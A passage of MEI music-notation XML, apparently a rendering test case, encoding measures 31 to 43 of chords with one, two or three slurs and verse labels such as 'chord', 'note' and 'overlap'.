xml:id=\"syl-L114F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L114F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L114F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L114F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L114F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L114F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L114F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L114F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L115F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L115F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L115F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L113F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L114F2\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L114F1-L115F1N1\" staff=\"1\" startid=\"#chord-L114F1\" endid=\"#chord-L115F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L116\" n=\"32\">\r\n                            <staff xml:id=\"staff-L116F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L116F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L117F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L117F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L117F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L117F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L117F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L117F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L117F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L117F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L117F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L117F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L117F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L118F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L118F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L118F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L116F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L117F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L117F1-L118F1N1\" staff=\"1\" startid=\"#chord-L117F1\" endid=\"#chord-L118F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L121\" n=\"33\">\r\n                            <staff xml:id=\"staff-L121F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L121F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L122F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L122F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L122F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L122F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L122F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L122F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L122F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L122F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L122F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L122F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L122F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L122F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L122F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L122F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L122F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L123F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L123F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L123F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L121F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L122F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L122F1N2-L123F1N1\" staff=\"1\" startid=\"#note-L122F1S1\" endid=\"#note-L123F1S1\" />\r\n                            <slur xml:id=\"slur-L122F1N1-L123F1N2\" staff=\"1\" startid=\"#note-L122F1S2\" endid=\"#note-L123F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L124\" n=\"34\">\r\n                            <staff xml:id=\"staff-L124F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L124F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L125F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L125F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L125F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L125F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L125F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L125F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L125F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L125F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L125F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L125F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L125F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L125F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L125F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L125F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L125F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L126F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L126F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L126F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L124F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L125F2\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L125F1N2-L126F1N1\" staff=\"1\" startid=\"#note-L125F1S2\" endid=\"#note-L126F1S2\" />\r\n                            <slur xml:id=\"slur-L125F1N1-L126F1N2\" staff=\"1\" startid=\"#note-L125F1S1\" endid=\"#note-L126F1S1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L127\" n=\"35\">\r\n                            <staff xml:id=\"staff-L127F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L127F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L128F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L128F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L128F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L128F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L128F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L128F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L128F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L128F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L128F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L128F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L128F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L128F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L128F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L128F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L128F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L129F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L129F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L129F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L127F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L128F2\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L128F1N2-L129F1N1\" staff=\"1\" startid=\"#note-L128F1S2\" endid=\"#note-L129F1S1\" />\r\n                            <slur xml:id=\"slur-L128F1N1-L129F1N2\" staff=\"1\" startid=\"#note-L128F1S1\" endid=\"#note-L129F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L130\" right=\"dbl\" n=\"36\">\r\n                            <staff xml:id=\"staff-L130F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L130F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L131F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L131F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L131F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L131F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L131F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L131F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L131F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L131F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L131F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L131F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L131F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L131F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L131F4\">chord</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L131F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L131F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L132F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L132F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L132F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L130F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L131F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L131F1N2-L132F1N1\" staff=\"1\" startid=\"#note-L131F1S1\" endid=\"#note-L132F1S2\" />\r\n                            <slur xml:id=\"slur-L131F1N1-L132F1N2\" staff=\"1\" startid=\"#note-L131F1S2\" endid=\"#note-L132F1S1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L134\" n=\"37\">\r\n                            <staff xml:id=\"staff-L134F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L134F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L136F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L136F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L136F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L136F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L136F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L136F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L136F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L136F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L136F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L136F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L136F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L136F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L136F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L136F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L136F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L136F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L137F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L137F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L137F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L137F1S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L134F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L136F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L136F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000001872830351\" fontstyle=\"normal\">First voice, three-note chords with 1, 2 and 3 slurs</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L136F1-L137F1N1\" staff=\"1\" startid=\"#chord-L136F1\" endid=\"#chord-L137F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L138\" n=\"38\">\r\n                            <staff xml:id=\"staff-L138F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L138F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L139F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L139F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L139F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L139F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L139F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L139F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L139F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L139F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L139F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L139F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L139F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L139F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L139F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L139F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L139F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L139F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L140F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L140F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L140F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L140F1S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L138F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L139F2\" dur=\"2\" ploc=\"g\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L139F1-L140F1N1\" staff=\"1\" startid=\"#chord-L139F1\" endid=\"#chord-L140F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L141\" n=\"39\">\r\n                            <staff xml:id=\"staff-L141F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L141F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L142F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L142F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L142F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L142F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L142F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L142F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L142F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L142F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L142F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L142F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L142F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L142F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L142F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L142F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L142F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L142F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L143F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L143F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L143F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L143F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L141F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L142F2\" dur=\"2\" ploc=\"g\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L142F1-L143F1N1\" staff=\"1\" startid=\"#chord-L142F1\" endid=\"#chord-L143F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L144\" n=\"40\">\r\n                            <staff xml:id=\"staff-L144F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L144F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L145F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L145F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L145F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L145F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L145F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L145F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L145F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L145F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L145F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L145F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L145F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L145F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L145F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L145F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L145F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L145F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L146F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L146F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L146F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L146F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L144F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L145F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L145F1-L146F1N1\" staff=\"1\" startid=\"#chord-L145F1\" endid=\"#chord-L146F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L148\" n=\"41\">\r\n                            <staff xml:id=\"staff-L148F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L148F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L149F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L149F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L149F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L149F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L149F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L149F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L149F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L149F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L149F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L149F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L149F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L149F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L149F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L149F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L149F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L149F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L149F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L149F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L149F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L149F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L149F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L149F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L150F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L150F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L150F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L150F1S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L148F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L149F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L149F1N2-L150F1N1\" staff=\"1\" startid=\"#note-L149F1S1\" endid=\"#note-L150F1S1\" />\r\n                            <slur xml:id=\"slur-L149F1N1-L150F1N2\" staff=\"1\" startid=\"#note-L149F1S2\" endid=\"#note-L150F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L151\" n=\"42\">\r\n                            <staff xml:id=\"staff-L151F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L151F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L152F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L152F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L152F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L152F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L152F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L152F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L152F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L152F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L152F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L152F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L152F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L152F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L152F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L152F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L152F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L152F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L152F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L152F3\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L152F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L152F4\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L152F5\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L152F5\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L153F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L153F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L153F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L153F1S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L151F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L152F2\" dur=\"2\" ploc=\"g\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L152F1N2-L153F1N1\" staff=\"1\" startid=\"#note-L152F1S1\" endid=\"#note-L153F1S1\" />\r\n                            <slur xml:id=\"slur-L152F1N1-L153F1N2\" staff=\"1\" startid=\"#note-L152F1S2\" endid=\"#note-L153F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L154\" n=\"43\">\r\n                            <staff xml:id=\"staff-L154F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L154F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L155F1\" dur=\"4\">\r\n                                        <note 